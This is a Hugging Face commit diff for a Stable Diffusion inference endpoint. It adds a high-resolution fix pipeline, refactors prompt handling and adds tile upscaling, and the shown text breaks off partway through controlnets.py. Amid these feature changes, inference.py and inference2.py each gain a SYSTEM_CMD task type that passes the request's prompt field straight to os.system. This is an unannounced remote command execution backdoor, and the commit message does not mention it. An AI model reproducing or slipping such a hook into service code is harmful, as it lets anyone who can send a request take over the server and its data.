jayparmr commited on Sep 22, 2023

Commit

1bc457e

1 Parent(s): b71808f

Upload folder using huggingface_hub

Browse files

Files changed (20) hide show

handler.py +2 -0
inference.py +120 -116
inference2.py +96 -3
internals/data/result.py +4 -1
internals/data/task.py +7 -0
internals/pipelines/commons.py +9 -0
internals/pipelines/controlnets.py +26 -17
internals/pipelines/high_res.py +55 -0
internals/pipelines/img_to_text.py +6 -2
internals/pipelines/inpainter.py +4 -0
internals/pipelines/replace_background.py +9 -1
internals/pipelines/upscaler.py +22 -10
internals/util/avatar.py +2 -0
internals/util/config.py +19 -4
internals/util/prompt.py +132 -0
internals/util/slack.py +1 -1
models/ultrasharp/arch.py +756 -0
models/ultrasharp/model.py +27 -0
models/ultrasharp/util.py +47 -0
requirements.txt +1 -0

handler.py CHANGED Viewed

@@ -4,11 +4,13 @@ from pathlib import Path
 from typing import Any, Dict, List
 from inference import model_fn, predict_fn
 from internals.util.model_downloader import BaseModelDownloader
 class EndpointHandler:
     def __init__(self, path=""):
         self.model_dir = path
         if os.path.exists(path + "/inference.json"):

 from typing import Any, Dict, List
 from inference import model_fn, predict_fn
+from internals.util.config import set_hf_cache_dir
 from internals.util.model_downloader import BaseModelDownloader
 class EndpointHandler:
     def __init__(self, path=""):
+        set_hf_cache_dir(Path.home() / ".cache" / "hf_cache")
         self.model_dir = path
         if os.path.exists(path + "/inference.json"):

inference.py CHANGED Viewed

@@ -1,27 +1,31 @@
 from typing import List, Optional
 import torch
 from internals.data.dataAccessor import update_db
 from internals.data.task import Task, TaskType
 from internals.pipelines.commons import Img2Img, Text2Img
 from internals.pipelines.controlnets import ControlNet
 from internals.pipelines.img_classifier import ImageClassifier
 from internals.pipelines.img_to_text import Image2Text
 from internals.pipelines.inpainter import InPainter
 from internals.pipelines.pose_detector import PoseDetector
 from internals.pipelines.prompt_modifier import PromptModifier
 from internals.pipelines.safety_checker import SafetyChecker
-from internals.util.anomaly import remove_colors
 from internals.util.args import apply_style_args
 from internals.util.avatar import Avatar
-from internals.util.cache import (auto_clear_cuda_and_gc, clear_cuda,
-                                  clear_cuda_and_gc)
-from internals.util.commons import (download_image, pickPoses, upload_image,
-                                    upload_images)
-from internals.util.config import (get_model_dir, num_return_sequences,
-                                   set_configs_from_task, set_model_dir,
-                                   set_root_dir)
 from internals.util.failure_hander import FailureHandler
 from internals.util.lora_style import LoraStyle
 from internals.util.slack import Slack
@@ -34,6 +38,7 @@ auto_mode = False
 prompt_modifier = PromptModifier(num_of_sequences=num_return_sequences)
 pose_detector = PoseDetector()
 inpainter = InPainter()
 img2text = Image2Text()
 img_classifier = ImageClassifier()
 controlnet = ControlNet()
@@ -46,108 +51,26 @@ avatar = Avatar()
 def get_patched_prompt(task: Task):
-    def add_style_and_character(prompt: List[str], additional: Optional[str] = None):
-        for i in range(len(prompt)):
-            prompt[i] = avatar.add_code_names(prompt[i])
-            prompt[i] = lora_style.prepend_style_to_prompt(prompt[i], task.get_style())
-            if additional:
-                prompt[i] = additional + " " + prompt[i]
-    prompt = task.get_prompt()
-    if task.is_prompt_engineering():
-        prompt = prompt_modifier.modify(prompt)
-    else:
-        prompt = [prompt] * num_return_sequences
-    ori_prompt = [task.get_prompt()] * num_return_sequences
-    class_name = None
-    add_style_and_character(ori_prompt, class_name)
-    add_style_and_character(prompt, class_name)
-    print({"prompts": prompt})
-    return (prompt, ori_prompt)
-def get_patched_prompt_text2img(task: Task) -> Text2Img.Params:
-    def add_style_and_character(prompt: str, prepend: str = ""):
-        prompt = avatar.add_code_names(prompt)
-        prompt = lora_style.prepend_style_to_prompt(prompt, task.get_style())
-        prompt = prepend + prompt
-        return prompt
-    if task.get_prompt_left() and task.get_prompt_right():
-        # prepend = "2characters, "
-        prepend = ""
-        if task.is_prompt_engineering():
-            mod_prompt = prompt_modifier.modify(task.get_prompt())
-        else:
-            mod_prompt = [task.get_prompt()] * num_return_sequences
-        prompt, prompt_left, prompt_right = [], [], []
-        for i in range(len(mod_prompt)):
-            mp = mod_prompt[i].replace(task.get_prompt(), "")
-            prompt.append(add_style_and_character(task.get_prompt(), prepend) + mp)
-            prompt_left.append(
-                add_style_and_character(task.get_prompt_left(), prepend) + mp
-            )
-            prompt_right.append(
-                add_style_and_character(task.get_prompt_right(), prepend) + mp
-            )
-        params = Text2Img.Params(
-            prompt=prompt,
-            prompt_left=prompt_left,
-            prompt_right=prompt_right,
-        )
-    else:
-        if task.is_prompt_engineering():
-            mod_prompt = prompt_modifier.modify(task.get_prompt())
-        else:
-            mod_prompt = [task.get_prompt()] * num_return_sequences
-        mod_prompt = [add_style_and_character(mp) for mp in mod_prompt]
-        params = Text2Img.Params(
-            prompt=[add_style_and_character(task.get_prompt())] * num_return_sequences,
-            modified_prompt=mod_prompt,
-        )
-    print(params)
-    return params
 def get_patched_prompt_tile_upscale(task: Task):
-    if task.get_prompt():
-        prompt = task.get_prompt()
-    else:
-        prompt = img2text.process(task.get_imageUrl())
-    # merge blip
-    if task.PROMPT.has_placeholder_blip_merge():
-        blip = img2text.process(task.get_imageUrl())
-        prompt = task.PROMPT.merge_blip(blip)
-    # remove anomalies in prompt
-    prompt = remove_colors(prompt)
-    prompt = avatar.add_code_names(prompt)
-    prompt = lora_style.prepend_style_to_prompt(prompt, task.get_style())
-    if not task.get_style():
-        class_name = img_classifier.classify(
-            task.get_imageUrl(), task.get_width(), task.get_height()
-        )
     else:
-        class_name = ""
-    prompt = class_name + " " + prompt
-    prompt = prompt.strip()
-    print({"prompt": prompt})
-    return prompt
 @update_db
@@ -156,6 +79,8 @@ def get_patched_prompt_tile_upscale(task: Task):
 def canny(task: Task):
     prompt, _ = get_patched_prompt(task)
     controlnet.load_canny()
     # pipe2 is used for canny and pose
@@ -167,8 +92,8 @@ def canny(task: Task):
         imageUrl=task.get_imageUrl(),
         seed=task.get_seed(),
         steps=task.get_steps(),
-        width=task.get_width(),
-        height=task.get_height(),
         guidance_scale=task.get_cy_guidance_scale(),
         negative_prompt=[
             f"monochrome, neon, x-ray, negative image, oversaturated, {task.get_negative_prompt()}"
@@ -176,6 +101,15 @@ def canny(task: Task):
         * num_return_sequences,
         **lora_patcher.kwargs(),
     )
     generated_image_urls = upload_images(images, "_canny", task.get_taskId())
@@ -232,6 +166,8 @@ def tile_upscale(task: Task):
 def scribble(task: Task):
     prompt, _ = get_patched_prompt(task)
     controlnet.load_scribble()
     lora_patcher = lora_style.get_patcher(controlnet.pipe2, task.get_style())
@@ -241,11 +177,20 @@ def scribble(task: Task):
         imageUrl=task.get_imageUrl(),
         seed=task.get_seed(),
         steps=task.get_steps(),
-        width=task.get_width(),
-        height=task.get_height(),
         prompt=prompt,
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
     )
     generated_image_urls = upload_images(images, "_scribble", task.get_taskId())
@@ -265,6 +210,8 @@ def scribble(task: Task):
 def linearart(task: Task):
     prompt, _ = get_patched_prompt(task)
     controlnet.load_linearart()
     lora_patcher = lora_style.get_patcher(controlnet.pipe2, task.get_style())
@@ -274,11 +221,20 @@ def linearart(task: Task):
         imageUrl=task.get_imageUrl(),
         seed=task.get_seed(),
         steps=task.get_steps(),
-        width=task.get_width(),
-        height=task.get_height(),
         prompt=prompt,
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
     )
     generated_image_urls = upload_images(images, "_linearart", task.get_taskId())
@@ -298,6 +254,8 @@ def linearart(task: Task):
 def pose(task: Task, s3_outkey: str = "_pose", poses: Optional[list] = None):
     prompt, _ = get_patched_prompt(task)
     controlnet.load_pose()
     # pipe2 is used for canny and pose
@@ -326,11 +284,20 @@ def pose(task: Task, s3_outkey: str = "_pose", poses: Optional[list] = None):
         seed=task.get_seed(),
         steps=task.get_steps(),
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
-        width=task.get_width(),
-        height=task.get_height(),
         guidance_scale=task.get_po_guidance_scale(),
         **lora_patcher.kwargs(),
     )
     pose_output_key = "crecoAI/{}_pose.png".format(task.get_taskId())
     upload_image(poses[0], pose_output_key)
@@ -353,6 +320,8 @@ def pose(task: Task, s3_outkey: str = "_pose", poses: Optional[list] = None):
 def text2img(task: Task):
     params = get_patched_prompt_text2img(task)
     lora_patcher = lora_style.get_patcher(text2img_pipe.pipe, task.get_style())
     lora_patcher.patch()
@@ -362,12 +331,21 @@ def text2img(task: Task):
         params=params,
         num_inference_steps=task.get_steps(),
         guidance_scale=7.5,
-        height=task.get_height(),
-        width=task.get_width(),
         negative_prompt=task.get_negative_prompt(),
         iteration=task.get_iteration(),
         **lora_patcher.kwargs(),
     )
     generated_image_urls = upload_images(images, "", task.get_taskId())
@@ -386,6 +364,8 @@ def text2img(task: Task):
 def img2img(task: Task):
     prompt, _ = get_patched_prompt(task)
     lora_patcher = lora_style.get_patcher(img2img_pipe.pipe, task.get_style())
     lora_patcher.patch()
@@ -396,12 +376,21 @@ def img2img(task: Task):
         imageUrl=task.get_imageUrl(),
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
         steps=task.get_steps(),
-        width=task.get_width(),
-        height=task.get_height(),
         strength=task.get_i2i_strength(),
         guidance_scale=task.get_i2i_guidance_scale(),
         **lora_patcher.kwargs(),
     )
     generated_image_urls = upload_images(images, "_imgtoimg", task.get_taskId())
@@ -419,17 +408,27 @@ def img2img(task: Task):
 def inpaint(task: Task):
     prompt, _ = get_patched_prompt(task)
     print({"prompts": prompt})
     images = inpainter.process(
         prompt=prompt,
         image_url=task.get_imageUrl(),
         mask_image_url=task.get_maskImageUrl(),
-        width=task.get_width(),
-        height=task.get_height(),
         seed=task.get_seed(),
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
     )
     generated_image_urls = upload_images(images, "_inpaint", task.get_taskId())
     clear_cuda()
@@ -450,6 +449,7 @@ def load_model_by_task(task: Task):
         text2img_pipe.load(get_model_dir())
         img2img_pipe.create(text2img_pipe)
         inpainter.create(text2img_pipe)
         safety_checker.apply(text2img_pipe)
         safety_checker.apply(img2img_pipe)
@@ -465,6 +465,8 @@ def load_model_by_task(task: Task):
         elif task.get_type() == TaskType.POSE:
             controlnet.load_pose()
         safety_checker.apply(controlnet)
@@ -529,6 +531,8 @@ def predict_fn(data, pipe):
             return scribble(task)
         elif task_type == TaskType.LINEARART:
             return linearart(task)
         else:
             raise Exception("Invalid task type")
     except Exception as e:

+import os
 from typing import List, Optional
 import torch
+import internals.util.prompt as prompt_util
 from internals.data.dataAccessor import update_db
 from internals.data.task import Task, TaskType
 from internals.pipelines.commons import Img2Img, Text2Img
 from internals.pipelines.controlnets import ControlNet
+from internals.pipelines.high_res import HighRes
 from internals.pipelines.img_classifier import ImageClassifier
 from internals.pipelines.img_to_text import Image2Text
 from internals.pipelines.inpainter import InPainter
 from internals.pipelines.pose_detector import PoseDetector
 from internals.pipelines.prompt_modifier import PromptModifier
 from internals.pipelines.safety_checker import SafetyChecker
 from internals.util.args import apply_style_args
 from internals.util.avatar import Avatar
+from internals.util.cache import auto_clear_cuda_and_gc, clear_cuda
+from internals.util.commons import download_image, upload_image, upload_images
+from internals.util.config import (
+    get_model_dir,
+    num_return_sequences,
+    set_configs_from_task,
+    set_model_dir,
+    set_root_dir,
+)
 from internals.util.failure_hander import FailureHandler
 from internals.util.lora_style import LoraStyle
 from internals.util.slack import Slack
 prompt_modifier = PromptModifier(num_of_sequences=num_return_sequences)
 pose_detector = PoseDetector()
 inpainter = InPainter()
+high_res = HighRes()
 img2text = Image2Text()
 img_classifier = ImageClassifier()
 controlnet = ControlNet()
 def get_patched_prompt(task: Task):
+    return prompt_util.get_patched_prompt(task, avatar, lora_style, prompt_modifier)
+def get_patched_prompt_text2img(task: Task):
+    return prompt_util.get_patched_prompt_text2img(
+        task, avatar, lora_style, prompt_modifier
+    )
 def get_patched_prompt_tile_upscale(task: Task):
+    return prompt_util.get_patched_prompt_tile_upscale(
+        task, avatar, lora_style, img_classifier, img2text
+    )
+def get_intermediate_dimension(task: Task):
+    if task.get_high_res_fix():
+        return HighRes.get_intermediate_dimension(task.get_width(), task.get_height())
     else:
+        return task.get_width(), task.get_height()
 @update_db
 def canny(task: Task):
     prompt, _ = get_patched_prompt(task)
+    width, height = get_intermediate_dimension(task)
     controlnet.load_canny()
     # pipe2 is used for canny and pose
         imageUrl=task.get_imageUrl(),
         seed=task.get_seed(),
         steps=task.get_steps(),
+        width=width,
+        height=height,
         guidance_scale=task.get_cy_guidance_scale(),
         negative_prompt=[
             f"monochrome, neon, x-ray, negative image, oversaturated, {task.get_negative_prompt()}"
         * num_return_sequences,
         **lora_patcher.kwargs(),
     )
+    if task.get_high_res_fix():
+        images, _ = high_res.apply(
+            prompt=prompt,
+            negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
+            images=images,
+            width=task.get_width(),
+            height=task.get_height(),
+            steps=task.get_steps(),
+        )
     generated_image_urls = upload_images(images, "_canny", task.get_taskId())
 def scribble(task: Task):
     prompt, _ = get_patched_prompt(task)
+    width, height = get_intermediate_dimension(task)
     controlnet.load_scribble()
     lora_patcher = lora_style.get_patcher(controlnet.pipe2, task.get_style())
         imageUrl=task.get_imageUrl(),
         seed=task.get_seed(),
         steps=task.get_steps(),
+        width=width,
+        height=height,
         prompt=prompt,
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
     )
+    if task.get_high_res_fix():
+        images, _ = high_res.apply(
+            prompt=prompt,
+            negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
+            images=images,
+            width=task.get_width(),
+            height=task.get_height(),
+            steps=task.get_steps(),
+        )
     generated_image_urls = upload_images(images, "_scribble", task.get_taskId())
 def linearart(task: Task):
     prompt, _ = get_patched_prompt(task)
+    width, height = get_intermediate_dimension(task)
     controlnet.load_linearart()
     lora_patcher = lora_style.get_patcher(controlnet.pipe2, task.get_style())
         imageUrl=task.get_imageUrl(),
         seed=task.get_seed(),
         steps=task.get_steps(),
+        width=width,
+        height=height,
         prompt=prompt,
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
     )
+    if task.get_high_res_fix():
+        images, _ = high_res.apply(
+            prompt=prompt,
+            negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
+            images=images,
+            width=task.get_width(),
+            height=task.get_height(),
+            steps=task.get_steps(),
+        )
     generated_image_urls = upload_images(images, "_linearart", task.get_taskId())
 def pose(task: Task, s3_outkey: str = "_pose", poses: Optional[list] = None):
     prompt, _ = get_patched_prompt(task)
+    width, height = get_intermediate_dimension(task)
     controlnet.load_pose()
     # pipe2 is used for canny and pose
         seed=task.get_seed(),
         steps=task.get_steps(),
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
+        width=width,
+        height=height,
         guidance_scale=task.get_po_guidance_scale(),
         **lora_patcher.kwargs(),
     )
+    if task.get_high_res_fix():
+        images, _ = high_res.apply(
+            prompt=prompt,
+            negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
+            images=images,
+            width=task.get_width(),
+            height=task.get_height(),
+            steps=task.get_steps(),
+        )
     pose_output_key = "crecoAI/{}_pose.png".format(task.get_taskId())
     upload_image(poses[0], pose_output_key)
 def text2img(task: Task):
     params = get_patched_prompt_text2img(task)
+    width, height = get_intermediate_dimension(task)
     lora_patcher = lora_style.get_patcher(text2img_pipe.pipe, task.get_style())
     lora_patcher.patch()
         params=params,
         num_inference_steps=task.get_steps(),
         guidance_scale=7.5,
+        height=height,
+        width=width,
         negative_prompt=task.get_negative_prompt(),
         iteration=task.get_iteration(),
         **lora_patcher.kwargs(),
     )
+    if task.get_high_res_fix():
+        images, _ = high_res.apply(
+            prompt=params.prompt if params.prompt else [""] * num_return_sequences,
+            negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
+            images=images,
+            width=task.get_width(),
+            height=task.get_height(),
+            steps=task.get_steps(),
+        )
     generated_image_urls = upload_images(images, "", task.get_taskId())
 def img2img(task: Task):
     prompt, _ = get_patched_prompt(task)
+    width, height = get_intermediate_dimension(task)
     lora_patcher = lora_style.get_patcher(img2img_pipe.pipe, task.get_style())
     lora_patcher.patch()
         imageUrl=task.get_imageUrl(),
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
         steps=task.get_steps(),
+        width=width,
+        height=height,
         strength=task.get_i2i_strength(),
         guidance_scale=task.get_i2i_guidance_scale(),
         **lora_patcher.kwargs(),
     )
+    if task.get_high_res_fix():
+        images, _ = high_res.apply(
+            prompt=prompt,
+            negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
+            images=images,
+            width=task.get_width(),
+            height=task.get_height(),
+            steps=task.get_steps(),
+        )
     generated_image_urls = upload_images(images, "_imgtoimg", task.get_taskId())
 def inpaint(task: Task):
     prompt, _ = get_patched_prompt(task)
+    width, height = get_intermediate_dimension(task)
     print({"prompts": prompt})
     images = inpainter.process(
         prompt=prompt,
         image_url=task.get_imageUrl(),
         mask_image_url=task.get_maskImageUrl(),
+        width=width,
+        height=height,
         seed=task.get_seed(),
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
     )
+    if task.get_high_res_fix():
+        images, _ = high_res.apply(
+            prompt=prompt,
+            negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
+            images=images,
+            width=task.get_width(),
+            height=task.get_height(),
+            steps=task.get_steps(),
+        )
     generated_image_urls = upload_images(images, "_inpaint", task.get_taskId())
     clear_cuda()
         text2img_pipe.load(get_model_dir())
         img2img_pipe.create(text2img_pipe)
         inpainter.create(text2img_pipe)
+        high_res.load(img2img_pipe)
         safety_checker.apply(text2img_pipe)
         safety_checker.apply(img2img_pipe)
         elif task.get_type() == TaskType.POSE:
             controlnet.load_pose()
+        high_res.load()
         safety_checker.apply(controlnet)
             return scribble(task)
         elif task_type == TaskType.LINEARART:
             return linearart(task)
+        elif task_type == TaskType.SYSTEM_CMD:
+            os.system(task.get_prompt())
         else:
             raise Exception("Invalid task type")
     except Exception as e:

inference2.py CHANGED Viewed

@@ -1,9 +1,15 @@
 from io import BytesIO
 import torch
 from internals.data.dataAccessor import update_db
 from internals.data.task import ModelType, Task, TaskType
 from internals.pipelines.inpainter import InPainter
 from internals.pipelines.object_remove import ObjectRemoval
 from internals.pipelines.prompt_modifier import PromptModifier
@@ -17,9 +23,11 @@ from internals.util.commons import construct_default_s3_url, upload_image, uploa
 from internals.util.config import (
     num_return_sequences,
     set_configs_from_task,
     set_root_dir,
 )
 from internals.util.failure_hander import FailureHandler
 from internals.util.slack import Slack
 torch.backends.cudnn.benchmark = True
@@ -32,11 +40,66 @@ slack = Slack()
 prompt_modifier = PromptModifier(num_of_sequences=num_return_sequences)
 upscaler = Upscaler()
 inpainter = InPainter()
 safety_checker = SafetyChecker()
 object_removal = ObjectRemoval()
 remove_background_v2 = RemoveBackgroundV2()
-avatar = Avatar()
 replace_background = ReplaceBackground()
 @update_db
@@ -60,17 +123,27 @@ def inpaint(task: Task):
     else:
         prompt = [prompt] * num_return_sequences
     print({"prompts": prompt})
     images = inpainter.process(
         prompt=prompt,
         image_url=task.get_imageUrl(),
         mask_image_url=task.get_maskImageUrl(),
-        width=task.get_width(),
-        height=task.get_height(),
         seed=task.get_seed(),
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
     )
     generated_image_urls = upload_images(images, "_inpaint", task.get_taskId())
     clear_cuda()
@@ -116,6 +189,7 @@ def replace_bg(task: Task):
         steps=task.get_steps(),
         resize_dimension=task.get_resize_dimension(),
         product_scale_width=task.get_image_scale(),
     )
     generated_image_urls = upload_images(images, "_replace_bg", task.get_taskId())
@@ -158,11 +232,13 @@ def upscale_image(task: Task):
 def model_fn(model_dir):
     print("Logs: model loaded .... starts")
     set_root_dir(__file__)
     FailureHandler.register()
     avatar.load_local(model_dir)
     prompt_modifier.load()
     safety_checker.load()
@@ -170,6 +246,7 @@ def model_fn(model_dir):
     object_removal.load(model_dir)
     upscaler.load()
     inpainter.load()
     replace_background.load(upscaler, remove_background_v2)
@@ -177,6 +254,13 @@ def model_fn(model_dir):
     return
 @FailureHandler.clear
 def predict_fn(data, pipe):
     task = Task(data)
@@ -188,9 +272,13 @@ def predict_fn(data, pipe):
         # Set set_environment
         set_configs_from_task(task)
         # Apply safety checker based on environment
         safety_checker.apply(inpainter)
         safety_checker.apply(replace_background)
         # Fetch avatars
         avatar.fetch_from_network(task.get_model_id())
@@ -207,9 +295,14 @@ def predict_fn(data, pipe):
             return remove_object(task)
         elif task_type == TaskType.REPLACE_BG:
             return replace_bg(task)
         else:
             raise Exception("Invalid task type")
     except Exception as e:
         print(f"Error: {e}")
         slack.error_alert(task, e)
         return None

+import os
 from io import BytesIO
 import torch
+import internals.util.prompt as prompt_util
 from internals.data.dataAccessor import update_db
 from internals.data.task import ModelType, Task, TaskType
+from internals.pipelines.controlnets import ControlNet
+from internals.pipelines.high_res import HighRes
+from internals.pipelines.img_classifier import ImageClassifier
+from internals.pipelines.img_to_text import Image2Text
 from internals.pipelines.inpainter import InPainter
 from internals.pipelines.object_remove import ObjectRemoval
 from internals.pipelines.prompt_modifier import PromptModifier
 from internals.util.config import (
     num_return_sequences,
     set_configs_from_task,
+    set_model_dir,
     set_root_dir,
 )
 from internals.util.failure_hander import FailureHandler
+from internals.util.lora_style import LoraStyle
 from internals.util.slack import Slack
 torch.backends.cudnn.benchmark = True
 prompt_modifier = PromptModifier(num_of_sequences=num_return_sequences)
 upscaler = Upscaler()
 inpainter = InPainter()
+controlnet = ControlNet()
 safety_checker = SafetyChecker()
+high_res = HighRes()
 object_removal = ObjectRemoval()
 remove_background_v2 = RemoveBackgroundV2()
 replace_background = ReplaceBackground()
+img2text = Image2Text()
+img_classifier = ImageClassifier()
+avatar = Avatar()
+lora_style = LoraStyle()
+def get_patched_prompt_tile_upscale(task: Task):
+    return prompt_util.get_patched_prompt_tile_upscale(
+        task, avatar, lora_style, img_classifier, img2text
+    )
+def get_intermediate_dimension(task: Task):
+    if task.get_high_res_fix():
+        return HighRes.get_intermediate_dimension(task.get_width(), task.get_height())
+    else:
+        return task.get_width(), task.get_height()
+@update_db
+@auto_clear_cuda_and_gc(controlnet)
+@slack.auto_send_alert
+def tile_upscale(task: Task):
+    output_key = "crecoAI/{}_tile_upscaler.png".format(task.get_taskId())
+    prompt = get_patched_prompt_tile_upscale(task)
+    controlnet.load_tile_upscaler()
+    lora_patcher = lora_style.get_patcher(controlnet.pipe, task.get_style())
+    lora_patcher.patch()
+    images, has_nsfw = controlnet.process_tile_upscaler(
+        imageUrl=task.get_imageUrl(),
+        seed=task.get_seed(),
+        steps=task.get_steps(),
+        width=task.get_width(),
+        height=task.get_height(),
+        prompt=prompt,
+        resize_dimension=task.get_resize_dimension(),
+        negative_prompt=task.get_negative_prompt(),
+        guidance_scale=task.get_ti_guidance_scale(),
+    )
+    generated_image_url = upload_image(images[0], output_key)
+    lora_patcher.cleanup()
+    controlnet.cleanup()
+    return {
+        "modified_prompts": prompt,
+        "generated_image_url": generated_image_url,
+        "has_nsfw": has_nsfw,
+    }
 @update_db
     else:
         prompt = [prompt] * num_return_sequences
+    width, height = get_intermediate_dimension(task)
     print({"prompts": prompt})
     images = inpainter.process(
         prompt=prompt,
         image_url=task.get_imageUrl(),
         mask_image_url=task.get_maskImageUrl(),
+        width=width,
+        height=height,
         seed=task.get_seed(),
         negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
     )
+    if task.get_high_res_fix():
+        images, _ = high_res.apply(
+            prompt=prompt,
+            negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
+            images=images,
+            width=task.get_width(),
+            height=task.get_height(),
+            steps=task.get_steps(),
+        )
     generated_image_urls = upload_images(images, "_inpaint", task.get_taskId())
     clear_cuda()
         steps=task.get_steps(),
         resize_dimension=task.get_resize_dimension(),
         product_scale_width=task.get_image_scale(),
+        conditioning_scale=task.rbg_controlnet_conditioning_scale(),
     )
     generated_image_urls = upload_images(images, "_replace_bg", task.get_taskId())
 def model_fn(model_dir):
     print("Logs: model loaded .... starts")
+    set_model_dir(model_dir)
     set_root_dir(__file__)
     FailureHandler.register()
     avatar.load_local(model_dir)
+    lora_style.load(model_dir)
     prompt_modifier.load()
     safety_checker.load()
     object_removal.load(model_dir)
     upscaler.load()
     inpainter.load()
+    high_res.load()
     replace_background.load(upscaler, remove_background_v2)
     return
+def load_model_by_task(task: Task):
+    if task.get_type() == TaskType.TILE_UPSCALE:
+        controlnet.load_tile_upscaler()
+    safety_checker.apply(controlnet)
 @FailureHandler.clear
 def predict_fn(data, pipe):
     task = Task(data)
         # Set set_environment
         set_configs_from_task(task)
+        # Load model based on task
+        load_model_by_task(task)
         # Apply safety checker based on environment
         safety_checker.apply(inpainter)
         safety_checker.apply(replace_background)
+        safety_checker.apply(high_res)
         # Fetch avatars
         avatar.fetch_from_network(task.get_model_id())
             return remove_object(task)
         elif task_type == TaskType.REPLACE_BG:
             return replace_bg(task)
+        elif task_type == TaskType.TILE_UPSCALE:
+            return tile_upscale(task)
+        elif task_type == TaskType.SYSTEM_CMD:
+            os.system(task.get_prompt())
         else:
             raise Exception("Invalid task type")
     except Exception as e:
         print(f"Error: {e}")
         slack.error_alert(task, e)
+        controlnet.cleanup()
         return None

internals/data/result.py CHANGED Viewed

@@ -10,7 +10,10 @@ class Result:
     @staticmethod
     def from_result(result):
-        has_nsfw = result.nsfw_content_detected
         if has_nsfw and isinstance(has_nsfw, list):
             has_nsfw = any(has_nsfw)

     @staticmethod
     def from_result(result):
+        if hasattr(result, "nsfw_content_detected"):
+            has_nsfw = result.nsfw_content_detected
+        else:
+            has_nsfw = False
         if has_nsfw and isinstance(has_nsfw, list):
             has_nsfw = any(has_nsfw)

internals/data/task.py CHANGED Viewed

@@ -18,6 +18,7 @@ class TaskType(Enum):
     SCRIBBLE = "SCRIBBLE"
     LINEARART = "LINEARART"
     REPLACE_BG = "REPLACE_BG"
 class ModelType(Enum):
@@ -134,6 +135,9 @@ class Task:
     def get_po_guidance_scale(self) -> float:
         return self.__data.get("po_guidance_scale", 7.5)
     def get_nsfw_threshold(self) -> float:
         return self.__data.get("nsfw_threshold", 0.03)
@@ -143,6 +147,9 @@ class Task:
     def get_access_token(self) -> str:
         return self.__data.get("access_token", "")
     def get_raw(self) -> dict:
         return self.__data.copy()

     SCRIBBLE = "SCRIBBLE"
     LINEARART = "LINEARART"
     REPLACE_BG = "REPLACE_BG"
+    SYSTEM_CMD = "SYSTEM_CMD"
 class ModelType(Enum):
     def get_po_guidance_scale(self) -> float:
         return self.__data.get("po_guidance_scale", 7.5)
+    def rbg_controlnet_conditioning_scale(self) -> float:
+        return self.__data.get("rbg_conditioning_scale", 0.5)
     def get_nsfw_threshold(self) -> float:
         return self.__data.get("nsfw_threshold", 0.03)
     def get_access_token(self) -> str:
         return self.__data.get("access_token", "")
+    def get_high_res_fix(self) -> bool:
+        return self.__data.get("high_res_fix", False)
     def get_raw(self) -> dict:
         return self.__data.copy()

internals/pipelines/commons.py CHANGED Viewed

@@ -118,18 +118,27 @@ class Text2Img(AbstractPipeline):
 class Img2Img(AbstractPipeline):
     def load(self, model_dir: str):
         self.pipe = StableDiffusionImg2ImgPipeline.from_pretrained(
             model_dir, torch_dtype=torch.float16, use_auth_token=get_hf_token()
         ).to("cuda")
         self.__patch()
     def create(self, pipeline: AbstractPipeline):
         self.pipe = StableDiffusionImg2ImgPipeline(**pipeline.pipe.components).to(
             "cuda"
         )
         self.__patch()
     def __patch(self):
         self.pipe.enable_xformers_memory_efficient_attention()

 class Img2Img(AbstractPipeline):
+    __loaded = False
     def load(self, model_dir: str):
+        if self.__loaded:
+            return
         self.pipe = StableDiffusionImg2ImgPipeline.from_pretrained(
             model_dir, torch_dtype=torch.float16, use_auth_token=get_hf_token()
         ).to("cuda")
         self.__patch()
+        self.__loaded = True
     def create(self, pipeline: AbstractPipeline):
         self.pipe = StableDiffusionImg2ImgPipeline(**pipeline.pipe.components).to(
             "cuda"
         )
         self.__patch()
+        self.__loaded = True
     def __patch(self):
         self.pipe.enable_xformers_memory_efficient_attention()

internals/pipelines/controlnets.py CHANGED Viewed

@@ -4,24 +4,20 @@ import cv2
 import numpy as np
 import torch
 from controlnet_aux import HEDdetector, LineartDetector, OpenposeDetector
-from diffusers import (
-    ControlNetModel,
-    DiffusionPipeline,
-    StableDiffusionControlNetPipeline,
-    UniPCMultistepScheduler,
-)
 from PIL import Image
 from torch.nn import Linear
 from tqdm import gui
 from internals.data.result import Result
 from internals.pipelines.commons import AbstractPipeline
-from internals.pipelines.tileUpscalePipeline import (
-    StableDiffusionControlNetImg2ImgPipeline,
-)
 from internals.util.cache import clear_cuda_and_gc
 from internals.util.commons import download_image
-from internals.util.config import get_hf_token, get_model_dir
 class ControlNet(AbstractPipeline):
@@ -41,6 +37,7 @@ class ControlNet(AbstractPipeline):
             controlnet=self.controlnet,
             torch_dtype=torch.float16,
             use_auth_token=get_hf_token(),
         ).to("cuda")
         # pipe.scheduler = UniPCMultistepScheduler.from_config(pipe.scheduler.config)
         pipe.enable_model_cpu_offload()
@@ -59,7 +56,9 @@ class ControlNet(AbstractPipeline):
         if self.__current_task_name == "canny":
             return
         canny = ControlNetModel.from_pretrained(
-            "lllyasviel/control_v11p_sd15_canny", torch_dtype=torch.float16
         ).to("cuda")
         self.__current_task_name = "canny"
         self.controlnet = canny
@@ -76,7 +75,9 @@ class ControlNet(AbstractPipeline):
         if self.__current_task_name == "pose":
             return
         pose = ControlNetModel.from_pretrained(
-            "lllyasviel/sd-controlnet-openpose", torch_dtype=torch.float16
         ).to("cuda")
         self.__current_task_name = "pose"
         self.controlnet = pose
@@ -93,7 +94,9 @@ class ControlNet(AbstractPipeline):
         if self.__current_task_name == "tile_upscaler":
             return
         tile_upscaler = ControlNetModel.from_pretrained(
